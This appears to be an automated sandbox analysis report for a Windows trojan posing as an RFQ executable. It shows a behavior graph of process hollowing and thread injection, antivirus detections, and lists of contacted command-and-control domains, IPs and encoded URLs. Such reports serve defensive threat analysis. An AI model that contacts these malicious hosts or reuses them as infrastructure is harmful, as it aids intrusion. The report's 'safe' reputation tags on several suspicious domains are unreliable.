          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467059 Sample: MKCC-MEC-RFQ-115-2024.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 34 www.momura.xyz 2->34 36 www.bvlazaedi.xyz 2->36 38 16 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 8 other signatures 2->50 11 MKCC-MEC-RFQ-115-2024.exe 4 2->11         started        signatures3 48 Performs DNS queries to domains with low reputation 36->48 process4 signatures5 60 Binary is likely a compiled AutoIt script file 11->60 62 Writes to foreign memory regions 11->62 64 Maps a DLL or memory area into another process 11->64 66 Switches to a custom stack to bypass stack traces 11->66 14 svchost.exe 11->14         started        process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 14->68 70 Maps a DLL or memory area into another process 14->70 72 Sample uses process hollowing technique 14->72 74 3 other signatures 14->74 17 explorer.exe 86 1 14->17 injected process8 dnsIp9 28 www.gb-electric-wheelchairs-8j.bond 185.53.179.91, 49715, 80 TEAMINTERNET-ASDE Germany 17->28 30 gt.huhusddfnsuegcdn.com 194.41.37.158, 49716, 80 SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK unknown 17->30 32 3 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 systray.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 58 Switches to a custom stack to bypass stack traces 21->58 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MKCC-MEC-RFQ-115-2024.exe39%ReversingLabsWin32.Trojan.Strab
          MKCC-MEC-RFQ-115-2024.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.zu89.topReferer:0%Avira URL Cloudsafe
          https://wns.windows.com/bat0%Avira URL Cloudsafe
          http://www.gas39.proReferer:0%Avira URL Cloudsafe
          http://www.zangbreaker.com0%Avira URL Cloudsafe
          http://www.checkout4xgrow.shop0%Avira URL Cloudsafe
          http://www.gas39.pro/ts59/0%Avira URL Cloudsafe
          http://www.texhio.online0%Avira URL Cloudsafe
          http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bond100%Avira URL Cloudmalware
          https://www.stacker.com/arizona/phoenix0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
          http://www.gb-electric-wheelchairs-8j.bondReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-0%Avira URL Cloudsafe
          http://www.modleavedepts.online/ts59/www.momura.xyz0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
          https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(0%Avira URL Cloudsafe
          http://www.gb-electric-wheelchairs-8j.bond/ts59/0%Avira URL Cloudsafe
          http://www.texhio.onlineReferer:0%Avira URL Cloudsafe
          http://www.bvlazaedi.xyz0%Avira URL Cloudsafe
          http://www.ec-delivery-jobs-8j.bond/ts59/0%Avira URL Cloudsafe
          http://www.gas39.pro0%Avira URL Cloudsafe
          http://www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX0%Avira URL Cloudsafe
          http://www.ujgddhhfeffsfgg2.group/ts59/0%Avira URL Cloudsafe
          http://www.00050516.xyz0%Avira URL Cloudsafe
          http://www.kgstrengthandperformance.com0%Avira URL Cloudsafe
          https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc0%Avira URL Cloudsafe
          https://api.msn.com/rT0%Avira URL Cloudsafe
          https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSp0%Avira URL Cloudsafe
          http://www.topallinoneaccounting.com/ts59/0%Avira URL Cloudsafe
          http://www.ujgddhhfeffsfgg2.group/ts59/www.modleavedepts.online0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
          http://www.gb-electric-wheelchairs-8j.bond/ts59/www.76466.club0%Avira URL Cloudsafe
          http://www.ec-delivery-jobs-8j.bond0%Avira URL Cloudsafe
          http://www.topallinoneaccounting.com/ts59/www.zangbreaker.com0%Avira URL Cloudsafe
          https://word.office.com0%Avira URL Cloudsafe
          http://www.checkout4xgrow.shop/ts59/0%Avira URL Cloudsafe
          http://www.ujgddhhfeffsfgg2.groupReferer:0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
          http://www.76466.club/ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP0%Avira URL Cloudsafe
          http://www.topallinoneaccounting.com0%Avira URL Cloudsafe
          http://www.gb-electric-wheelchairs-8j.bond/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ0%Avira URL Cloudsafe
          http://www.zu89.top0%Avira URL Cloudsafe
          http://www.momura.xyz0%Avira URL Cloudsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSJM0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark0%Avira URL Cloudsafe
          http://www.00050516.xyz/ts59/0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.modleavedepts.onlineReferer:0%Avira URL Cloudsafe
          http://www.zu89.top/ts59/100%Avira URL Cloudmalware
          https://android.notify.windows.com/iOSZM0%Avira URL Cloudsafe
          http://www.babyscan.xyz0%Avira URL Cloudsafe
          http://www.bvlazaedi.xyz/ts59/www.babyscan.xyz0%Avira URL Cloudsafe
          https://www.yelp.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
          http://www.76466.club/ts59/0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
          http://www.bvlazaedi.xyz/ts59/0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?z$0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark0%Avira URL Cloudsafe
          http://www.momura.xyzReferer:0%Avira URL Cloudsafe
          http://www.76466.club0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%Avira URL Cloudsafe
          http://www.kgstrengthandperformance.com/ts59/www.bvlazaedi.xyz0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist0%Avira URL Cloudsafe
          http://www.babyscan.xyz/ts59/www.gb-electric-wheelchairs-8j.bond0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%Avira URL Cloudsafe
          http://www.ec-delivery-jobs-8j.bond/ts59/www.zu89.top0%Avira URL Cloudsafe
          http://www.kgstrengthandperformance.com/ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
          http://www.checkout4xgrow.shop/ts59/www.kgstrengthandperformance.com0%Avira URL Cloudsafe
          http://www.00050516.xyzReferer:0%Avira URL Cloudsafe
          https://parade.com/61481/toriavey/where-did-hamburgers-originate0%Avira URL Cloudsafe
          https://octagonal-waiter-408.notion.site/Notion-publish-test-5ffca584256043babdad0fd9159cb223?pvs=40%Avira URL Cloudsafe
          http://www.zangbreaker.com/ts59/0%Avira URL Cloudsafe
          http://www.momura.xyz/ts59/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%Avira URL Cloudsafe
          http://www.texhio.online/ts59/0%Avira URL Cloudsafe
          https://api.msn.com/~T0%Avira URL Cloudsafe
          http://www.76466.club/ts59/www.ujgddhhfeffsfgg2.group0%Avira URL Cloudsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb0%Avira URL Cloudsafe
          http://www.ujgddhhfeffsfgg2.group0%Avira URL Cloudsafe
          http://www.momura.xyz/ts59/www.gas39.pro0%Avira URL Cloudsafe
          http://www.topallinoneaccounting.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%Avira URL Cloudsafe
          http://www.modleavedepts.online/ts59/0%Avira URL Cloudsafe
          http://www.babyscan.xyz/ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al0%Avira URL Cloudsafe
          http://www.zangbreaker.com/ts59/www.texhio.online0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          gt.huhusddfnsuegcdn.com
          		194.41.37.158
          		truetrue
            		unknown
            www.topallinoneaccounting.com
            		188.114.96.3
            		truetrue
              		unknown
              edge.redirect.pizza
              		89.106.200.1
              		truetrue
                		unknown
                modleavedepts.online
                		104.194.9.178
                		truetrue
                  		unknown
                  00050516.xyz
                  		65.21.196.90
                  		truetrue
                    		unknown
                    www.gb-electric-wheelchairs-8j.bond
                    		185.53.179.91
                    		truetrue
                      		unknown
                      kgstrengthandperformance.com
                      		76.223.105.230
                      		truetrue
                        		unknown
                        www.checkout4xgrow.shop
                        		188.114.97.3
                        		truetrue
                          		unknown
                          www.babyscan.xyz
                          		3.64.163.50
                          		truetrue
                            		unknown
                            www.bvlazaedi.xyz
                            		unknown
                            		unknowntrue
                              		unknown
                              www.00050516.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.gas39.pro
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.modleavedepts.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.kgstrengthandperformance.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.momura.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.ujgddhhfeffsfgg2.group
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.76466.club
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkXtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gb-electric-wheelchairs-8j.bond/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.76466.club/ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BPtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kgstrengthandperformance.com/ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BPtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.babyscan.xyz/ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BPtrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.texhio.onlineexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.checkout4xgrow.shopexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zangbreaker.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wns.windows.com/batexplorer.exe, 00000003.00000002.3882013964.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290803241.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.stacker.com/arizona/phoenixexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000003.2291674421.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3089297174.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1435576590.0000000002F10000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zu89.topReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bondexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.gas39.pro/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gas39.proReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gb-electric-wheelchairs-8j.bondReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.modleavedepts.online/ts59/www.momura.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://excel.office.comexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 00000003.00000002.3885261844.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gb-electric-wheelchairs-8j.bond/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ec-delivery-jobs-8j.bond/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.texhio.onlineReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bvlazaedi.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gas39.proexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kgstrengthandperformance.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.00050516.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ujgddhhfeffsfgg2.group/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://android.notify.windows.com/iOSpexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com/rTexplorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.topallinoneaccounting.com/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ujgddhhfeffsfgg2.group/ts59/www.modleavedepts.onlineexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.3881369935.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438491997.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290624703.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3082368155.00000000085E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
